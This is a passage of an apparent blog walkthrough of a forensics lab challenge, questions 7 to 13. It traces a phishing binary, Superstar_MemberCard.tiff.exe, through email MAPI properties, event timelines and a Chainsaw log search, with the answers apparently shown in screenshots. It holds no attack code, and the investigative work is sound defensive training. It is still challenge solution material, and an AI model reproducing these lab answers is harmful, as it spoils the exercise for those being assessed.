24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>7. At what time (UTC) did the binary successfully send an identical malicious email from the victim&#8217;s machine to all the contacts?</strong></p><p><strong>Method:</strong></p><ul><li><p>Open the <strong>Sent Mail</strong> folder in PSTWalker.</p></li><li><p>Right-click the email and choose <strong>MAPI Properties</strong>.</p></li><li><p>Check the <strong>PR_CLIENT_SUBMIT_TIME</strong> property and convert it to UTC.</p><ul><li><p>Compare the time to the binary&#8217;s execution time to ensure consistency.</p></li></ul></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8d5i!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8d5i!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 424w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 848w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 1272w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8d5i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png" width="603" height="441" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:441,&quot;width&quot;:603,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8d5i!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 424w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 848w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 1272w, https://substackcdn.com/image/fetch/$s_!8d5i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7dadcb91-713f-4656-b27a-02ea0d7367a9_603x441.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>8. How many recipients were targeted by the distribution of the said email excluding the victim&#8217;s email account?</strong></p><p><strong>Method:</strong></p><ul><li><p>In PSTWalker, check the <strong>MAPI properties</strong> of the email.</p></li><li><p>Count the recipients listed in the <strong>To</strong> and <strong>BCC</strong> fields.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!G0jS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!G0jS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 424w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 848w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 1272w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!G0jS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png" width="281" height="565" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:565,&quot;width&quot;:281,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!G0jS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 424w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 848w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 1272w, https://substackcdn.com/image/fetch/$s_!G0jS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fddaa2526-8a10-401f-8e9d-9521ac590d40_281x565.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>9. Which legitimate program was utilized to obtain details regarding the domain controller?</strong></p><p><strong>Method:</strong></p><ul><li><p>Open <strong>Timeline Explorer</strong> and filter for the process: <br>Superstar_MemberCard.tiff.exe</p></li><li><p>Check the <strong>Payload</strong> section for related commands such as nltest.exe, whoami, or net.exe.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1GWQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1GWQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 424w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 848w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 1272w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1GWQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png" width="1456" height="61" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:61,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1GWQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 424w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 848w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 1272w, https://substackcdn.com/image/fetch/$s_!1GWQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0c4a7397-e7eb-4472-8a64-8fcdb0ce771d_1659x69.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>10. Specify the domain (including sub-domain if applicable) that was used to download the tool for exfiltration.</strong></p><p><strong>Method:</strong></p><ul><li><p>Open <strong>Timeline Explorer</strong> and filter the <strong>Map Description</strong> for: <br>DNSEvent</p></li><li><p>Identify the domains queried that led to the download.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KGvz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KGvz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 424w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 848w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 1272w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KGvz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png" width="1318" height="205" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:205,&quot;width&quot;:1318,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KGvz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 424w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 848w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 1272w, https://substackcdn.com/image/fetch/$s_!KGvz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd05e1a48-f21f-4187-a7b0-e50ac727e18b_1318x205.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>11. The threat actor attempted to conceal the tool to elude suspicion. Can you specify the name of the folder used to store and hide the file transfer program?</strong></p><p><strong>Method:</strong></p><ul><li><p>In <strong>Timeline Explorer</strong>, filter for: <br>Superstar_MemberCard.tiff.exe</p></li><li><p>Locate the <strong>Parent Directory</strong> or folder path where the executable resides.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FMyv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FMyv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 424w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 848w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 1272w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FMyv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png" width="1456" height="58" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:58,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FMyv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 424w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 848w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 1272w, https://substackcdn.com/image/fetch/$s_!FMyv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe836e409-5349-4bf9-a8eb-2396c8cf0db0_1576x63.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>12. Under which MITRE ATT&amp;CK technique does the action described in question #11 fall?</strong></p><p><strong>Method:</strong></p><ul><li><p>Conduct a quick online search for the action (e.g., file concealment, renaming, or hiding directories).</p></li><li><p>The likely MITRE ATT&amp;CK technique is <strong>T1564.001 - Hidden Files and Directories</strong>.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BVLg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BVLg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 424w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 848w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 1272w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BVLg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png" width="1456" height="373" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:373,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BVLg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 424w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 848w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 1272w, https://substackcdn.com/image/fetch/$s_!BVLg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe55b07e6-9eb4-4658-8f93-d2eafe5ab4a9_1866x478.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>13. Can you determine the minimum number of files that were compressed before they were extracted?</strong></p><p><strong>Method:</strong></p><ul><li><p><strong>Note:</strong> Timeline Explorer may not always show all files.</p></li><li><p>Use <strong>Chainsaw</strong> in Kali Linux: <br>./chainsaw search --skip-errors "Superstar_MemberCard.tiff.exe" C/ | grep TargetFilename &gt; files.txt<br>cat files.txt | grep -vE ".exe|.ps1|tiff|zip|HelpDesk" | grep ".*\..*" | sort | uniq</p></li><li><p>Check for the number of unique file paths extracted from the compressed file.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aZFc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a9b9405-4ccd-4cb7-8856-5a8f824769f3_836x45.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source 